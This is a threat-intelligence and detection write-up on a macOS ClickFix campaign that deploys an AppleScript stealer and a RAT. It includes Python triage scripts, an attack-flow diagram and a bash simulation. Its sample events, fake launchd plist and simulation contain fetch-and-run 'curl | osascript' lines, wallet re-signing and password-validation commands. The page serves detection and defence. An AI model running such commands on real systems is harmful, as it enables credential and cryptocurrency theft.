macOS ClickFix Lures Deploy an AppleScript Stealer and Persistent RAT
Summary
A Russian-speaking threat actor is using a ClickFix social engineering campaign to deploy a two-stage macOS malware infection. The attack starts with a fileless execution chain launched through terminal commands and delivers an AppleScript-based infostealer called Meow (DEBUG) along with a persistent remote access trojan. The malware targets cryptocurrency wallets, browser credentials, and messaging session data, while also carrying out intrusive code injection into desktop wallet applications.
Investigation
Netskope Threat Labs identified an updated version of the campaign on May 31, 2026, showing a shift from a basic stealer to a more capable RAT. Their analysis uncovered a sophisticated fileless infection flow, geofencing logic designed to avoid Russian-speaking victims, and ad-hoc re-signing used to bypass macOS Gatekeeper protections. The researchers also linked the campaign to 25 short-lived lure domains that shared the same registrar contact information.
Mitigation
Defenders should prioritize blocking lure domains and monitoring for suspicious terminal commands involving curl and osascript. Organizations should apply tighter controls over terminal access and watch for unauthorized changes to cryptocurrency wallet application bundles. Host-based detection can also focus on the persistence plist com.apple.accountsd and the /tmp/shub_ staging pattern.
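The host-side monitoring this section asks for, as an added example that is not part of the original page or of Netskope's research: a small Python triage routine run over constructed process and file events. The event shape (a dict with image, ancestors, cmdline and an optional file_path), the field names, the rule names and the sample events are all assumptions made here; the indicators themselves are the ones the page names (osascript calling curl with a spoofed User-Agent, curl piped into osascript, kill -9 from an osascript chain, forced ad-hoc re-signing of a wallet bundle, dscl -authonly, the /tmp/shub_ prefix, archives under /tmp, and a com.apple.accountsd plist outside /System/Library).

```python
"""Triage macOS process and file telemetry for the ClickFix stealer chain.

Added example, not Netskope's or the detection platform's own rule code.
The event shape and the sample events below are constructed; the indicators
are the ones the page names.
"""
import re
import shlex
from typing import Dict, List

# Desktop wallets the page names as targets of bundle tampering.
WALLET_APPS = ("Exodus.app", "Ledger Live.app")
# Apple's own launchd items live here; a com.apple.* plist elsewhere is suspect.
SYSTEM_LAUNCHD = ("/System/Library/LaunchAgents/", "/System/Library/LaunchDaemons/")


def _argv(cmdline: str) -> List[str]:
    """Split a command line the way a shell would; fall back on whitespace."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return cmdline.split()


def _adhoc_identity(argv: List[str]) -> bool:
    """True when codesign is told to sign with the ad-hoc identity (-s -)."""
    for i, arg in enumerate(argv):
        if arg == "-s-" or (arg == "-s" and i + 1 < len(argv) and argv[i + 1] == "-"):
            return True
    return False


def classify(event: Dict) -> List[str]:
    """Return the rule names an event matches; an empty list means no finding."""
    hits: List[str] = []
    cmdline = event.get("cmdline", "")
    argv = _argv(cmdline)
    base = event.get("image", "").rsplit("/", 1)[-1]
    via_osascript = "osascript" in event.get("ancestors", [])
    file_path = event.get("file_path", "")

    # curl launched from an osascript chain with -k/-s or a browser User-Agent
    if base == "curl" and via_osascript and ({"-k", "-s"} & set(argv) or "Mozilla/" in cmdline):
        hits.append("osascript_spawns_curl")
    # shell one-liner that fetches a script and pipes it straight into osascript
    if base in ("sh", "bash", "zsh") and re.search(r"\bcurl\b[^|]*\|\s*osascript\b", cmdline):
        hits.append("curl_piped_to_osascript")
    # hard kill issued from the same osascript chain (wallet shutdown step)
    if base in ("kill", "killall", "pkill") and "-9" in argv and via_osascript:
        hits.append("osascript_kill_9")
    # forced ad-hoc re-signing of a wallet bundle after tampering
    if (base == "codesign" and {"-f", "--force"} & set(argv) and _adhoc_identity(argv)
            and any(app in cmdline for app in WALLET_APPS)):
        hits.append("adhoc_resign_wallet_bundle")
    # validating a harvested password against the local directory
    if base == "dscl" and "-authonly" in argv:
        hits.append("dscl_authonly")
    # the staging prefix the page reports
    if "/tmp/shub_" in cmdline or file_path.startswith("/tmp/shub_"):
        hits.append("shub_staging_path")
    # archive written into the temporary folder before exfiltration
    if base in ("zip", "ditto", "tar") and re.search(r"/tmp/\S+\.(zip|tar|gz)\b", cmdline):
        hits.append("archive_in_tmp")
    # persistence plist borrowing Apple's accountsd label outside /System/Library
    if file_path.endswith("/com.apple.accountsd.plist") and not file_path.startswith(SYSTEM_LAUNCHD):
        hits.append("accountsd_plist_outside_system")
    return hits


def triage(events: List[Dict]) -> Dict[int, List[str]]:
    """Map event id -> matched rules, keeping only events with at least one hit."""
    report: Dict[int, List[str]] = {}
    for event in events:
        hits = classify(event)
        if hits:
            report[event["id"]] = hits
    return report


# Constructed telemetry; not captured from a real host. "ancestors" lists the
# parent chain nearest-first, e.g. kill <- sh <- osascript <- Terminal.
SAMPLE_EVENTS = [
    {"id": 1, "image": "/usr/bin/curl", "ancestors": ["sh", "osascript", "Terminal"],
     "cmdline": 'curl -k -s --max-time 30 -H "User-Agent: Mozilla/5.0" http://example.invalid/p'},
    {"id": 2, "image": "/bin/sh", "ancestors": ["Terminal"],
     "cmdline": "sh -c 'curl -fsSL http://example.invalid/s | osascript'"},
    {"id": 3, "image": "/bin/kill", "ancestors": ["sh", "osascript", "Terminal"],
     "cmdline": "kill -9 4242"},
    {"id": 4, "image": "/usr/bin/codesign", "ancestors": ["sh", "osascript"],
     "cmdline": "codesign -f -s - --deep /Applications/Exodus.app"},
    {"id": 5, "image": "/usr/bin/dscl", "ancestors": ["sh", "osascript"],
     "cmdline": "dscl . -authonly alice REDACTED"},
    {"id": 6, "image": "/usr/bin/ditto", "ancestors": ["sh", "osascript"],
     "cmdline": "ditto -c -k /tmp/shub_1234/collected /tmp/shub_1234/collected.zip"},
    {"id": 7, "image": "/bin/cp", "ancestors": ["sh"],
     "file_path": "/Users/alice/Library/LaunchAgents/com.apple.accountsd.plist",
     "cmdline": "cp /tmp/x.plist /Users/alice/Library/LaunchAgents/com.apple.accountsd.plist"},
    {"id": 8, "image": "/usr/bin/curl", "ancestors": ["zsh", "Terminal"],   # benign
     "cmdline": "curl -fsSL https://example.invalid/index.html"},
]

if __name__ == "__main__":
    for event_id, rules in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

The ancestor check matters more than the individual commands: curl, kill and codesign are all common on a developer's Mac, but none of them normally runs underneath osascript, and that parent chain is what the page's Suspicious Curl Execution and Fileless AppleScript Stealer detections key on. In a real pipeline the ancestors list would come from the EDR's process tree rather than being supplied inline.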
Response
If this activity is detected, isolate the affected macOS host immediately to stop further data theft or potential lateral movement. All installed desktop cryptocurrency wallets should be treated as compromised and reinstalled from trusted sources. Investigators should also perform a forensic review of LaunchDaemons and LaunchAgents for unauthorized entries, with particular attention to com.apple.accountsd.
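The LaunchDaemons and LaunchAgents review called for above, as an added example that is not part of the original page or of any vendor's tooling: a Python routine that parses launchd property lists with the standard plistlib module and applies heuristics drawn from the page. The plist contents, file paths, rule names and the Apple-path allow-lists are assumptions made here; the only facts taken from outside the page are that Apple's genuine com.apple.accountsd entry lives under /System/Library and that third-party software has no business using a com.apple.* label.

```python
"""Review launchd plists for entries masquerading as Apple services.

Added example, not the page's or any vendor's tooling. Heuristics drawn from
the page: a com.apple.accountsd entry anywhere other than /System/Library, a
com.apple.* label whose program is not an Apple-shipped binary, a program
staged under /tmp (the page's /tmp/shub_ pattern), and an interpreter wrapper
(sh -c / osascript -e) that would keep the fileless chain alive across
reboots. The plist contents and paths below are constructed.
"""
import os
import plistlib
from typing import Dict, List

# Where Apple's own launchd items live (sealed system volume on modern macOS).
APPLE_LAUNCHD_DIRS = ("/System/Library/LaunchAgents/", "/System/Library/LaunchDaemons/")
# Prefixes under which Apple-shipped binaries are found (assumed allow-list).
APPLE_BINARY_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")
INTERPRETERS = {"sh", "bash", "zsh", "osascript"}


def program_of(plist: Dict) -> str:
    """Path launchd will execute: Program, else ProgramArguments[0]."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def review_plist(path: str, data: bytes) -> List[str]:
    """Return heuristic findings for one plist; an empty list means nothing notable."""
    try:
        plist = plistlib.loads(data)
    except Exception:  # malformed XML or binary plist: worth a look on its own
        return ["unparseable_plist"]
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    program = program_of(plist)
    in_apple_dir = path.startswith(APPLE_LAUNCHD_DIRS)
    findings: List[str] = []

    if label == "com.apple.accountsd" and not in_apple_dir:
        findings.append("accountsd_label_outside_system")
    if label.startswith("com.apple.") and not in_apple_dir and not program.startswith(APPLE_BINARY_PREFIXES):
        findings.append("apple_label_nonapple_program")
    if os.path.basename(program) in INTERPRETERS and ({"-c", "-e"} & set(args)):
        findings.append("interpreter_inline_script")
    if program.startswith(TEMP_PREFIXES) or any("/tmp/shub_" in a for a in args):
        findings.append("program_in_temp_dir")
    return findings


def scan(directories) -> Dict[str, List[str]]:
    """Walk real launchd directories on a host and report findings per file."""
    report: Dict[str, List[str]] = {}
    for directory in directories:
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(directory, name)
            with open(path, "rb") as fh:
                findings = review_plist(path, fh.read())
            if findings:
                report[path] = findings
    return report


# Constructed sample: a persistence plist borrowing Apple's accountsd label,
# wrapping a fetch-and-pipe-to-osascript one-liner with a 60-second interval.
FAKE_ACCOUNTSD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.accountsd</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL http://example.invalid/s | osascript</string>
  </array>
  <key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
  <key>StartInterval</key><integer>60</integer>
</dict></plist>"""

SAMPLES: Dict[str, bytes] = {
    "/Users/alice/Library/LaunchAgents/com.apple.accountsd.plist": FAKE_ACCOUNTSD,
    # constructed stand-in for Apple's genuine entry (path and program assumed)
    "/System/Library/LaunchAgents/com.apple.accountsd.plist": plistlib.dumps({
        "Label": "com.apple.accountsd",
        "ProgramArguments": ["/System/Library/Frameworks/Accounts.framework/Support/accountsd"]}),
    "/Library/LaunchDaemons/com.example.updater.plist": plistlib.dumps({
        "Label": "com.example.updater", "Program": "/Library/Application Support/Example/updater",
        "RunAtLoad": True}),
    "/Library/LaunchAgents/com.apple.softwareupdate.plist": plistlib.dumps({
        "Label": "com.apple.softwareupdate",
        "ProgramArguments": ["/tmp/shub_8812/agent", "--beacon"], "StartInterval": 60}),
}


def review_samples() -> Dict[str, List[str]]:
    """Run the review over the constructed samples, keeping only files with findings."""
    return {p: f for p, f in ((p, review_plist(p, d)) for p, d in SAMPLES.items()) if f}


if __name__ == "__main__":
    for path, findings in review_samples().items():
        print(f"{path}: {', '.join(findings)}")
```

On a live host, scan(["/Library/LaunchDaemons", "/Library/LaunchAgents", os.path.expanduser("~/Library/LaunchAgents")]) covers the locations an unprivileged or root-level installer can write to; anything it reports with an Apple-looking label should be pulled for review together with the program it points at, since removing the plist alone leaves the already-running job in place until launchctl unloads it.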
Attack Flow
graph TB
    %% Class Definitions
    classDef action fill:#99ccff
    classDef tool fill:#cccccc
    classDef malware fill:#ff9999
    classDef persistence fill:#99ff99
    classDef exfiltration fill:#ffff99

    %% Initial Access and Execution
    attack_drive_by["<b>Action</b> – <b idea='T1189'>Drive-by Compromise</b><br/>Victims visit malicious lure domains<br/>such as filesapphirecanvas.sbs or<br/>filemintcastle.sbs masquerading as<br/>macOS utilities or GitHub repositories."]
    class attack_drive_by action
    attack_user_exec_copy["<b>Action</b> – <b idea='T1204.004'>User Execution: Malicious Copy and Paste</b><br/>Social engineering victims to copy<br/>commands from fake websites into<br/>the macOS Terminal."]
    class attack_user_exec_copy action
    attack_obfuscation["<b>Action</b> – <b idea='T1027.009'>Obfuscated Files or Information: Embedded Payloads</b><br/>Uses gzip-compressed and base64-encoded<br/>heredoc to run a stage 1 loader in memory."]
    class attack_obfuscation action

    %% Loader Logic and Guardrails
    loader_stage1["<b>Process</b> – <b idea='Stage 1 Loader'>Memory Resident Loader</b><br/>Executes via obfuscated command chain<br/>to avoid disk footprint."]
    class loader_stage1 tool
    guardrail_geofence["<b>Action</b> – <b idea='T1480.002'>Execution Guardrails: Mutual Exclusion</b><br/>Checks macOS keyboard layout to<br/>avoid Russian-speaking users via<br/>geofencing logic."]
    class guardrail_geofence action
    loader_reflective["<b>Action</b> – <b idea='T1620'>Reflective Code Loading</b><br/>Fetches second-stage AppleScript<br/>via curl and pipes directly into<br/>osascript memory."]
    class loader_reflective action

    %% Payload and Credential Theft
    malware_meow["<b>Malware</b> – <b idea='Meow Payload'>Meow Payload</b><br/>Memory-resident payload active<br/>after reflective loading."]
    class malware_meow malware
    attack_gui_capture["<b>Action</b> – <b idea='T1056.002'>Input Capture: GUI Input Capture</b><br/>Uses a spoofed System Preferences<br/>dialog to harvest user login passwords."]
    class attack_gui_capture action
    attack_securityd["<b>Action</b> – <b idea='T1555.002'>Credentials from Password Stores: Securityd Memory</b><br/>Unlocks macOS keychain to extract<br/>Safe Storage keys using harvested<br/>passwords."]
    class attack_securityd action

    %% Data Theft and Exfiltration
    attack_browser_discovery["<b>Action</b> – <b idea='T1217'>Browser Information Discovery</b><br/>Scans for browser data across<br/>Chrome, Safari, and Firefox."]
    class attack_browser_discovery action
    attack_session_steal["<b>Action</b> – <b idea='T1539'>Steal Web Session Cookie</b><br/>Exfiltrates session cookies to<br/>maintain unauthorized access."]
    class attack_session_steal exfiltration
    attack_crypto_theft["<b>Action</b> – <b idea='T1657'>Financial Theft</b><br/>Targets cryptocurrency wallets including<br/>MetaMask extensions and desktop apps<br/>like Exodus and Ledger."]
    class attack_crypto_theft exfiltration

    %% Persistence and C2
    persistence_launch["<b>Persistence</b> – <b idea='T1543.001'>LaunchAgent or LaunchDaemon</b><br/>Creates a persistent mechanism<br/>disguised as com.apple.accountsd."]
    class persistence_launch persistence
    c2_beaconing["<b>Action</b> – <b idea='T1568'>Command and Control</b><br/>Establishes a 60-second beaconing loop<br/>with Dynamic Resolution for arbitrary<br/>code execution."]
    class c2_beaconing tool

    %% Connections
    attack_drive_by -->|leads_to| attack_user_exec_copy
    attack_user_exec_copy -->|triggers| attack_obfuscation
    attack_obfuscation -->|executes| loader_stage1
    loader_stage1 -->|performs| guardrail_geofence
    guardrail_geofence -->|enables| loader_reflective
    loader_reflective -->|loads| malware_meow
    malware_meow -->|performs| attack_gui_capture
    attack_gui_capture -->|facilitates| attack_securityd
    attack_securityd -->|leads_to| attack_browser_discovery
    attack_browser_discovery -->|leads_to| attack_session_steal
    attack_browser_discovery -->|leads_to| attack_crypto_theft
    malware_meow -->|establishes| persistence_launch
    malware_meow -->|communicates_with| c2_beaconing
Detections
- Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
- Possible MacOS Browser Password Discovery Attempt (via cmdline)
- Possible Base64 Encoded Strings Manipulation [MacOS] (via cmdline)
- Forced Code Signing of Modified Application Bundle (via cmdline)
- MacOS Credential Validation via Dscl Authonly (via cmdline)
- Suspicious Curl Execution Attempt [MacOS] (via cmdline)
- Archive Was Created In MacOS Temporary Folder (via file_event)
- Detection of Fileless macOS AppleScript Stealer Execution [Linux Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
- Attack Narrative & Commands: An adversary has gained initial access via a malicious website. They execute a fileless macOS AppleScript to bypass file-based scanning. The script's goal is to download a secondary payload while spoofing a legitimate Chrome browser User-Agent to evade basic network inspection, then immediately terminate any running cryptocurrency wallet applications to prevent the user from securing their funds. The attacker uses osascript to call curl with specific flags and kill -9 to perform these actions.
- Regression Test Script:
#!/bin/bash
# Simulation of Fileless macOS AppleScript Stealer
echo "[+] Starting Simulation: Fileless macOS Stealer"

# Step 1: Simulate the curl payload fetch via osascript (Triggers selection_curl_ua)
# The double quotes around the User-Agent header must be escaped (\") so that
# AppleScript keeps them inside the string it hands to the shell.
echo "[+] Executing Stage 1: Spoofed Curl via osascript..."
osascript -e 'do shell script "curl -k -s --max-time 30 -H \"User-Agent: Mozilla/5.0\" http://localhost:8080/payload"' 2>/dev/null &

# Wait a moment for process creation
sleep 2

# Step 2: Simulate process termination (Triggers selection_kill)
# We use a dummy process to kill so we don't disrupt the system
echo "[+] Executing Stage 2: Process Termination via osascript..."
sleep 1
# Note: $$ is expanded by the /bin/sh that "do shell script" spawns, so this
# kills only that subshell, simulating the intent
osascript -e 'do shell script "kill -9 $$"'

# Note: For a cleaner simulation that mimics a real target, start a throwaway
# background process and pass its PID (expanded by the outer shell) to osascript:
# sleep 30 &
# osascript -e "do shell script \"kill -9 $!\""

echo "[+] Simulation Commands Sent."
- Cleanup Commands:
# No files were created by the script, but we ensure no lingering background processes exist.
killall osascript 2>/dev/null
echo "[+] Cleanup Complete."